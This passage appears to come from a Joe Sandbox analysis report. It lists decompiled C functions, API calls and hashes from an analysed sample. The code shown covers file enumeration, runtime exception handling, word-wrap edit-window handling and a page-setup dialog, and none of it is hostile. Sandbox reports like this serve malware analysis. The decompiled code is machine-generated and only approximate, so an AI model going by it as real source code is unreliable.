										__eflags =  *((intOrPtr*)(_t81 + 2)) - _t105;
										if( *((intOrPtr*)(_t81 + 2)) == _t105) {
											goto L24;
										} else {
											goto L23;
										}
									}
								}
							}
							goto L37;
							L24:
							__eflags = _v612 - _t105;
							if(_v612 != _t105) {
								E01364B6E(_v624);
								_pop(_t110);
							}
							__eflags = FindNextFileW(_t123,  &_v600);
						} while (__eflags != 0);
						_t90 = _v608;
						_t115 = _v664;
						_t120 =  *_t90;
						_t93 =  *((intOrPtr*)(_t90 + 4)) -  *_t90 >> 2;
						__eflags = _t115 - _t93;
						if(_t115 != _t93) {
							__eflags = _t93 - _t115;
							E01386940(_t120, _t120 + _t115 * 4, _t93 - _t115, 4, E0136DD58);
						}
						FindClose(_t123);
						__eflags = _v636 - _t105;
						if(_v636 != _t105) {
							E01364B6E(_v648);
						}
						_t84 = 0;
					} else {
						_push(_v608);
						_t124 = E0136D74D( &_v600, _t121, _t105, _t105);
						__eflags = _v636 - _t105;
						if(_v636 != _t105) {
							E01364B6E(_v648);
						}
						_t84 = _t124;
					}
					L37:
					_pop(_t122);
				} else {
					_t8 = _t121 + 1; // 0x1
					if(_t106 == _t8) {
						_t59 = _v601;
						goto L10;
					} else {
						_push(_t120);
						_t105 = 0;
						_t84 = E0136D74D(_t106, _t121, 0, 0);
					}
				}
				return L01353E0D(_t84, _t105, _v8 ^ _t125, _t120, _t121, _t122);
			}














































                                                                                              0x0136d7fe
                                                                                              0x0136d809
                                                                                              0x0136d810
                                                                                              0x0136d813
                                                                                              0x0136d816
                                                                                              0x0136d81b
                                                                                              0x0136d81e
                                                                                              0x0136d826
                                                                                              0x0136d828
                                                                                              0x0136d828
                                                                                              0x0136d82c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d83f
                                                                                              0x0136d843
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d843
                                                                                              0x0136d845
                                                                                              0x0136d845
                                                                                              0x0136d84b
                                                                                              0x0136d84d
                                                                                              0x0136d855
                                                                                              0x0136d877
                                                                                              0x0136d877
                                                                                              0x0136d879
                                                                                              0x0136d87b
                                                                                              0x0136d887
                                                                                              0x0136d887
                                                                                              0x0136d87d
                                                                                              0x0136d87d
                                                                                              0x0136d87f
                                                                                              0x00000000
                                                                                              0x0136d881
                                                                                              0x0136d881
                                                                                              0x0136d883
                                                                                              0x0136d885
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d885
                                                                                              0x0136d87f
                                                                                              0x0136d88f
                                                                                              0x0136d897
                                                                                              0x0136d89d
                                                                                              0x0136d89e
                                                                                              0x0136d8a0
                                                                                              0x0136d8a8
                                                                                              0x0136d8ae
                                                                                              0x0136d8b4
                                                                                              0x0136d8ba
                                                                                              0x0136d8ce
                                                                                              0x0136d8d3
                                                                                              0x0136d8de
                                                                                              0x0136d8f4
                                                                                              0x0136d8f6
                                                                                              0x0136d8f9
                                                                                              0x0136d929
                                                                                              0x0136d932
                                                                                              0x0136d932
                                                                                              0x0136d937
                                                                                              0x0136d93d
                                                                                              0x0136d93d
                                                                                              0x0136d943
                                                                                              0x0136d949
                                                                                              0x0136d94f
                                                                                              0x0136d955
                                                                                              0x0136d95b
                                                                                              0x0136d97c
                                                                                              0x0136d981
                                                                                              0x0136d986
                                                                                              0x0136d98a
                                                                                              0x0136d990
                                                                                              0x0136d993
                                                                                              0x0136d9a6
                                                                                              0x0136d9a6
                                                                                              0x0136d9b4
                                                                                              0x0136d9b9
                                                                                              0x0136d9bc
                                                                                              0x0136d9c2
                                                                                              0x0136d9c4
                                                                                              0x0136da3f
                                                                                              0x0136da45
                                                                                              0x0136da4d
                                                                                              0x0136da52
                                                                                              0x0136da54
                                                                                              0x0136da5a
                                                                                              0x0136da60
                                                                                              0x0136da68
                                                                                              0x0136da6d
                                                                                              0x0136da6e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d995
                                                                                              0x0136d995
                                                                                              0x0136d998
                                                                                              0x0136d99a
                                                                                              0x00000000
                                                                                              0x0136d99c
                                                                                              0x0136d99c
                                                                                              0x0136d99f
                                                                                              0x00000000
                                                                                              0x0136d9a1
                                                                                              0x0136d9a1
                                                                                              0x0136d9a4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136d9a4
                                                                                              0x0136d99f
                                                                                              0x0136d99a
                                                                                              0x00000000
                                                                                              0x0136d9c6
                                                                                              0x0136d9c6
                                                                                              0x0136d9cc
                                                                                              0x0136d9d4
                                                                                              0x0136d9d9
                                                                                              0x0136d9d9
                                                                                              0x0136d9e8
                                                                                              0x0136d9e8
                                                                                              0x0136d9f0
                                                                                              0x0136d9f6
                                                                                              0x0136d9fc
                                                                                              0x0136da03
                                                                                              0x0136da06
                                                                                              0x0136da08
                                                                                              0x0136da0f
                                                                                              0x0136da18
                                                                                              0x0136da1d
                                                                                              0x0136da21
                                                                                              0x0136da27
                                                                                              0x0136da2d
                                                                                              0x0136da35
                                                                                              0x0136da3a
                                                                                              0x0136da3b
                                                                                              0x0136d8fb
                                                                                              0x0136d8fb
                                                                                              0x0136d90c
                                                                                              0x0136d90e
                                                                                              0x0136d914
                                                                                              0x0136d91c
                                                                                              0x0136d921
                                                                                              0x0136d922
                                                                                              0x0136d922
                                                                                              0x0136da74
                                                                                              0x0136da74
                                                                                              0x0136d857
                                                                                              0x0136d857
                                                                                              0x0136d85c
                                                                                              0x0136d871
                                                                                              0x00000000
                                                                                              0x0136d85e
                                                                                              0x0136d85e
                                                                                              0x0136d85f
                                                                                              0x0136d864
                                                                                              0x0136d869
                                                                                              0x0136d85c
                                                                                              0x0136da82

                                                                                              APIs
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0136D8EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: 5911c2a756ee63acbd3e2ad4cc8e47ad92472586ee1fdc5d943eba35b0871dd1
                                                                                              • Instruction ID: e48491a2c9164ac5007fbd99af33f1c1c794a223a10644e50502047118737025
                                                                                              • Opcode Fuzzy Hash: 5911c2a756ee63acbd3e2ad4cc8e47ad92472586ee1fdc5d943eba35b0871dd1
                                                                                              • Instruction Fuzzy Hash: D171D671E051699FEF21EFBCCC8CAAEBBBDAB45208F1481D9D08D97118DA354E848F54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136DB70 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 80%
                                                                                              			E0136DB70(WCHAR* _a4, signed int _a8, char* _a12) {
				signed int _v8;
				short _v552;
				short _v554;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				signed int _v608;
				signed int _v612;
				intOrPtr _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed char _t32;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t45;
				int _t48;
				signed int* _t59;
				char* _t60;
				WCHAR* _t68;
				signed int _t70;
				void* _t71;

				_t30 =  *0x139e210; // 0xbb40e64e
				_v8 = _t30 ^ _t70;
				_t65 = _a8;
				_t60 = _a12;
				_t68 = _a4;
				_v608 = _t60;
				if(_t65 != _t68) {
					while(E0136DD76( *_t65 & 0x0000ffff) == 0) {
						_t65 = _t65 - 2;
						if(_t65 != _t68) {
							continue;
						}
						break;
					}
					_t60 = _v608;
				}
				_t69 =  *_t65 & 0x0000ffff;
				if(( *_t65 & 0x0000ffff) != 0x3a || _t65 ==  &(_t68[1])) {
					_t60 =  &_v601;
					_t32 = E0136DD76(_t69);
					_t65 = (_t65 - _t68 >> 1) + 1;
					asm("sbb eax, eax");
					_t59 = 0;
					_v612 =  ~(_t32 & 0x000000ff) & _t65;
					_t69 = FindFirstFileExW(_t68, 0,  &_v600, 0, 0, 0);
					if(_t69 != 0xffffffff) {
						_t59 = _v608;
						_v608 = _t59[1] -  *_t59 >> 2;
						_t41 = 0x2e;
						do {
							if(_v600.cFileName != _t41 || _v554 != 0 && (_v554 != _t41 || _v552 != 0)) {
								_push(_t59);
								_t43 = E0136DABC(_t60,  &(_v600.cFileName), _t68, _v612);
								_t71 = _t71 + 0x10;
								_v616 = _t43;
								if(_t43 != 0) {
									FindClose(_t69);
									_t45 = _v616;
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t69,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t65 =  *_t59;
						_t63 = _v608;
						_t51 = _t59[1] -  *_t59 >> 2;
						if(_v608 != _t59[1] -  *_t59 >> 2) {
							E01386940(_t65, _t65 + _t63 * 4, _t51 - _t63, 4, E0136DD58);
						}
						FindClose(_t69);
						_t45 = 0;
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_push(_t60);
					_t59 = 0;
					L7:
					_t45 = E0136DABC(_t60, _t68, _t59, _t59);
				}
				L21:
				return L01353E0D(_t45, _t59, _v8 ^ _t70, _t65, _t68, _t69);
			}

























                                                                                              0x0136db7b
                                                                                              0x0136db82
                                                                                              0x0136db85
                                                                                              0x0136db88
                                                                                              0x0136db8e
                                                                                              0x0136db91
                                                                                              0x0136db99
                                                                                              0x0136db9b
                                                                                              0x0136dbae
                                                                                              0x0136dbb3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136dbb3
                                                                                              0x0136dbb5
                                                                                              0x0136dbb5
                                                                                              0x0136dbbb
                                                                                              0x0136dbc1
                                                                                              0x0136dbde
                                                                                              0x0136dbe4
                                                                                              0x0136dbf0
                                                                                              0x0136dbf3
                                                                                              0x0136dbf5
                                                                                              0x0136dbfc
                                                                                              0x0136dc11
                                                                                              0x0136dc16
                                                                                              0x0136dc20
                                                                                              0x0136dc30
                                                                                              0x0136dc36
                                                                                              0x0136dc37
                                                                                              0x0136dc3e
                                                                                              0x0136dc5d
                                                                                              0x0136dc6c
                                                                                              0x0136dc71
                                                                                              0x0136dc74
                                                                                              0x0136dc7c
                                                                                              0x0136dccb
                                                                                              0x0136dcd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136dc7e
                                                                                              0x0136dc86
                                                                                              0x0136dc90
                                                                                              0x0136dc90
                                                                                              0x0136dc96
                                                                                              0x0136dc9a
                                                                                              0x0136dca0
                                                                                              0x0136dca5
                                                                                              0x0136dcc0
                                                                                              0x0136dcc5
                                                                                              0x0136dca8
                                                                                              0x0136dcae
                                                                                              0x0136dc18
                                                                                              0x0136dc18
                                                                                              0x00000000
                                                                                              0x0136dc18
                                                                                              0x0136dbca
                                                                                              0x0136dbca
                                                                                              0x0136dbcb
                                                                                              0x0136dbcd
                                                                                              0x0136dbd0
                                                                                              0x0136dbd5
                                                                                              0x0136dcd7
                                                                                              0x0136dce5

                                                                                              APIs
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0136DC0B
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0136DC86
                                                                                              • FindClose.KERNEL32(00000000), ref: 0136DCA8
                                                                                              • FindClose.KERNEL32(00000000), ref: 0136DCCB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1164774033-0
                                                                                              • Opcode ID: 9a39d3243ea728a90739c86065ea41c800379cb7ce23753ad1cfa9d4d41c664c
                                                                                              • Instruction ID: d5de317cf868349882bb89d1399e7ef515600731e622a02f3d258290b4594e67
                                                                                              • Opcode Fuzzy Hash: 9a39d3243ea728a90739c86065ea41c800379cb7ce23753ad1cfa9d4d41c664c
                                                                                              • Instruction Fuzzy Hash: 30419471A0061DAFDF20EFA8DD88DBAB77DEB85208F048195E585D718CE6709E84CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135387F Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E0135387F(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E013537F3(_t34);
				 *_t60 = 0x2cc;
				_v632 = E01354D30(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E01354D30(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E013537F3(_t49);
				}
				return _t49;
			}


































                                                                                              0x0135387f
                                                                                              0x0135387f
                                                                                              0x0135387f
                                                                                              0x01353893
                                                                                              0x01353895
                                                                                              0x01353898
                                                                                              0x01353898
                                                                                              0x0135389c
                                                                                              0x013538a1
                                                                                              0x013538b9
                                                                                              0x013538bf
                                                                                              0x013538c5
                                                                                              0x013538cb
                                                                                              0x013538d1
                                                                                              0x013538d7
                                                                                              0x013538dd
                                                                                              0x013538e4
                                                                                              0x013538eb
                                                                                              0x013538f2
                                                                                              0x013538f9
                                                                                              0x01353900
                                                                                              0x01353907
                                                                                              0x01353908
                                                                                              0x01353911
                                                                                              0x01353917
                                                                                              0x0135391a
                                                                                              0x01353920
                                                                                              0x0135392f
                                                                                              0x0135393b
                                                                                              0x01353946
                                                                                              0x0135394d
                                                                                              0x01353954
                                                                                              0x0135395f
                                                                                              0x01353967
                                                                                              0x01353970
                                                                                              0x01353972
                                                                                              0x01353975
                                                                                              0x01353977
                                                                                              0x01353981
                                                                                              0x01353989
                                                                                              0x0135398f
                                                                                              0x00000000
                                                                                              0x01353996
                                                                                              0x01353999

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0135388B
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 01353957
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01353977
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 01353981
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 5fd040b01ddaae951ffd0c3958155e04045ec79d63d8a7294eb5d31d68e554e4
                                                                                              • Instruction ID: 953fe6400855b71174a86fbb82bdf661b8897c4c023c78bc9c15541b35ea92a7
                                                                                              • Opcode Fuzzy Hash: 5fd040b01ddaae951ffd0c3958155e04045ec79d63d8a7294eb5d31d68e554e4
                                                                                              • Instruction Fuzzy Hash: A23129B5D4521D9BDF61DFA4D989BCCBBF8BF08704F1040AAE40DAB240EB719A858F45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01352580 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 94windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 81%
                                                                                              			E01352580() {
				struct tagRECT _v16;
				int _v20;
				int _t6;
				WCHAR* _t8;
				int _t10;
				struct HWND__* _t16;
				long _t24;
				signed int _t27;
				int _t30;
				void* _t35;

				_t6 = GetWindowTextLengthW( *0x139ebd8);
				_t30 = _t6;
				_t8 = HeapAlloc(GetProcessHeap(), 0, _t6 + _t6 + 2);
				if(_t8 != 0) {
					_t35 = _t8;
					GetWindowTextW( *0x139ebd8, _t8, _t30 + 1);
					_t10 = SendMessageW( *0x139ebd8, 0xb8, 0, 0);
					DestroyWindow( *0x139ebd8);
					GetClientRect( *0x139ebd0,  &_v16);
					_t15 =  ==  ? 0x50a00044 : 0x50b000c4;
					_t16 = CreateWindowExW(0x200, L"edit", 0,  ==  ? 0x50a00044 : 0x50b000c4, 0, 0, _v20, _v16,  *0x139ebd0, 0,  *0x139ebcc, 0);
					 *0x139ebd8 = _t16;
					SendMessageW(_t16, 0x30,  *0x139ebdc, 0);
					SetWindowTextW( *0x139ebd8, _t35);
					SendMessageW( *0x139ebd8, 0xb9, _t10, 0);
					SetFocus( *0x139ebd8);
					HeapFree(GetProcessHeap(), 0, _t35);
					_t27 = 0 |  *0x139ec48 == 0x00000000;
					 *0x139ec48 = _t27;
					_t24 = CheckMenuItem(GetMenu( *0x139ebd0), 0x119, _t27 << 3);
					_push(0);
					_push(0);
					_push(0x13526d0);
					_push( *0x139ebd8);
					L0139391D();
					return _t24;
				}
				return _t8;
			}













                                                                                              0x0135258c
                                                                                              0x01352592
                                                                                              0x013525a4
                                                                                              0x013525ac
                                                                                              0x013525b2
                                                                                              0x013525bf
                                                                                              0x013525da
                                                                                              0x013525e4
                                                                                              0x013525f3
                                                                                              0x0135260a
                                                                                              0x01352636
                                                                                              0x0135263c
                                                                                              0x0135264c
                                                                                              0x01352655
                                                                                              0x01352669
                                                                                              0x01352671
                                                                                              0x01352681
                                                                                              0x01352690
                                                                                              0x01352693
                                                                                              0x013526af
                                                                                              0x013526b5
                                                                                              0x013526b7
                                                                                              0x013526b9
                                                                                              0x013526be
                                                                                              0x013526c4
                                                                                              0x00000000
                                                                                              0x013526c4
                                                                                              0x013526cf

                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32 ref: 0135258C
                                                                                              • GetProcessHeap.KERNEL32 ref: 0135259A
                                                                                              • HeapAlloc.KERNEL32(00000000,00000000), ref: 013525A4
                                                                                              • GetWindowTextW.USER32 ref: 013525BF
                                                                                              • SendMessageW.USER32(000000B8,00000000,00000000), ref: 013525DA
                                                                                              • DestroyWindow.USER32 ref: 013525E4
                                                                                              • GetClientRect.USER32 ref: 013525F3
                                                                                              • CreateWindowExW.USER32 ref: 01352636
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0135264C
                                                                                              • SetWindowTextW.USER32(00000000), ref: 01352655
                                                                                              • SendMessageW.USER32(000000B9,00000000,00000000), ref: 01352669
                                                                                              • SetFocus.USER32 ref: 01352671
                                                                                              • GetProcessHeap.KERNEL32 ref: 01352677
                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01352681
                                                                                              • GetMenu.USER32 ref: 013526A2
                                                                                              • CheckMenuItem.USER32(00000000,00000119,00000000), ref: 013526AF
                                                                                              • #410.COMCTL32(013526D0,00000000,00000000), ref: 013526C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Heap$MessageSendText$MenuProcess$#410AllocCheckClientCreateDestroyFocusFreeItemLengthRect
                                                                                              • String ID: edit
                                                                                              • API String ID: 2317382731-2167791130
                                                                                              • Opcode ID: affe5f7f37b31442d1f3fbe062554048c2f472230f9419681cab8f08fc1a7e8c
                                                                                              • Instruction ID: b65d994124df03b70892c8722792598cfc7c55ec867c93c01de6205625e02e39
                                                                                              • Opcode Fuzzy Hash: affe5f7f37b31442d1f3fbe062554048c2f472230f9419681cab8f08fc1a7e8c
                                                                                              • Instruction Fuzzy Hash: 38310CB3284300FFFB319BA1EC49F663A6DEB44742F101034F602A61E8D6B35891DB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01352A70 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 129windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 89%
                                                                                              			E01352A70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t18;
				intOrPtr _t42;
				struct HWND__* _t69;
				void* _t70;

				_t70 = 0;
				_t18 = _a8;
				_t69 = _a4;
				if(_t18 == 0x110) {
					SetDlgItemTextW(_t69, 0x141, 0x139f94c);
					SetDlgItemTextW(_t69, 0x143, 0x139fb54);
					SetDlgItemInt(_t69, 0x14d, (0x51eb851f *  *0x139f93c >> 0x20 >> 5) + (0x51eb851f *  *0x139f93c >> 0x20 >> 0x1f), 0);
					SetDlgItemInt(_t69, 0x150, (0x51eb851f *  *0x139f940 >> 0x20 >> 5) + (0x51eb851f *  *0x139f940 >> 0x20 >> 0x1f), 0);
					SetDlgItemInt(_t69, 0x147, (0x51eb851f *  *0x139f944 >> 0x20 >> 5) + (0x51eb851f *  *0x139f944 >> 0x20 >> 0x1f), 0);
					SetDlgItemInt(_t69, 0x14a, (0x51eb851f *  *0x139f948 >> 0x20 >> 5) + (0x51eb851f *  *0x139f948 >> 0x20 >> 0x1f), 0);
				} else {
					if(_t18 == 0x111) {
						_t42 = _a12;
						if(_t42 == 9) {
							MessageBoxW( *0x139ebd0, L"Sorry, no help available", L"Help", 0x30);
							goto L10;
						} else {
							if(_t42 == 2) {
								_push(2);
								goto L9;
							} else {
								if(_t42 == 1) {
									GetDlgItemTextW(_t69, 0x141, 0x139f94c, 0);
									GetDlgItemTextW(_t69, 0x143, 0x139fb54, 0);
									 *0x139f93c = GetDlgItemInt(_t69, 0x14d, 0, 0) * 0x64;
									 *0x139f940 = GetDlgItemInt(_t69, 0x150, 0, 0) * 0x64;
									 *0x139f944 = GetDlgItemInt(_t69, 0x147, 0, 0) * 0x64;
									 *0x139f948 = GetDlgItemInt(_t69, 0x14a, 0, 0) * 0x64;
									_push(1);
									L9:
									EndDialog(_t69, ??);
									L10:
									_t70 = 1;
								}
							}
						}
					}
				}
				return _t70;
			}







                                                                                              0x01352a73
                                                                                              0x01352a75
                                                                                              0x01352a79
                                                                                              0x01352a82
                                                                                              0x01352b44
                                                                                              0x01352b51
                                                                                              0x01352b77
                                                                                              0x01352b97
                                                                                              0x01352bb7
                                                                                              0x01352bd7
                                                                                              0x01352a88
                                                                                              0x01352a8d
                                                                                              0x01352a93
                                                                                              0x01352a9a
                                                                                              0x01352bed
                                                                                              0x00000000
                                                                                              0x01352aa0
                                                                                              0x01352aa3
                                                                                              0x01352bf5
                                                                                              0x00000000
                                                                                              0x01352aa9
                                                                                              0x01352aac
                                                                                              0x01352ac5
                                                                                              0x01352ad4
                                                                                              0x01352aeb
                                                                                              0x01352aff
                                                                                              0x01352b13
                                                                                              0x01352b27
                                                                                              0x01352b2c
                                                                                              0x01352bf7
                                                                                              0x01352bf8
                                                                                              0x01352bfe
                                                                                              0x01352bfe
                                                                                              0x01352bfe
                                                                                              0x01352aac
                                                                                              0x01352aa3
                                                                                              0x01352a9a
                                                                                              0x01352a8d
                                                                                              0x01352c08

                                                                                              APIs
                                                                                              • GetDlgItemTextW.USER32(?,00000141,0139F94C,00000000), ref: 01352AC5
                                                                                              • GetDlgItemTextW.USER32(?,00000143,0139FB54,00000000), ref: 01352AD4
                                                                                              • GetDlgItemInt.USER32(?,0000014D,00000000,00000000), ref: 01352AE6
                                                                                              • GetDlgItemInt.USER32(?,00000150,00000000,00000000), ref: 01352AFA
                                                                                              • GetDlgItemInt.USER32(?,00000147,00000000,00000000), ref: 01352B0E
                                                                                              • GetDlgItemInt.USER32(?,0000014A,00000000,00000000), ref: 01352B22
                                                                                              • SetDlgItemTextW.USER32 ref: 01352B44
                                                                                              • SetDlgItemTextW.USER32 ref: 01352B51
                                                                                              • SetDlgItemInt.USER32 ref: 01352B77
                                                                                              • SetDlgItemInt.USER32 ref: 01352B97
                                                                                              • SetDlgItemInt.USER32 ref: 01352BB7
                                                                                              • SetDlgItemInt.USER32 ref: 01352BD7
                                                                                              • MessageBoxW.USER32(Sorry, no help available,Help,00000030), ref: 01352BED
                                                                                              • EndDialog.USER32(?,00000002), ref: 01352BF8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Text$DialogMessage
                                                                                              • String ID: Help$Sorry, no help available
                                                                                              • API String ID: 538086343-856071037
                                                                                              • Opcode ID: 22ea8863102bbff255e59cdae0d54cd523dcbc4cc5f4674a0dfd7b520def6175
                                                                                              • Instruction ID: d77b3325465f4c3478ef6737907156c60d53e3251002bdbb15e20c2dca25809f
                                                                                              • Opcode Fuzzy Hash: 22ea8863102bbff255e59cdae0d54cd523dcbc4cc5f4674a0dfd7b520def6175
                                                                                              • Instruction Fuzzy Hash: 4D31CF31B81714BBF7259A599C83F7A2A6DA7D9F04F105029FB00FE3D4C6A0ED019765
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01360C1E Relevance: 22.8, APIs: 15, Instructions: 332COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 80%
                                                                                              			E01360C1E(void* __edx, void* __fp0, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
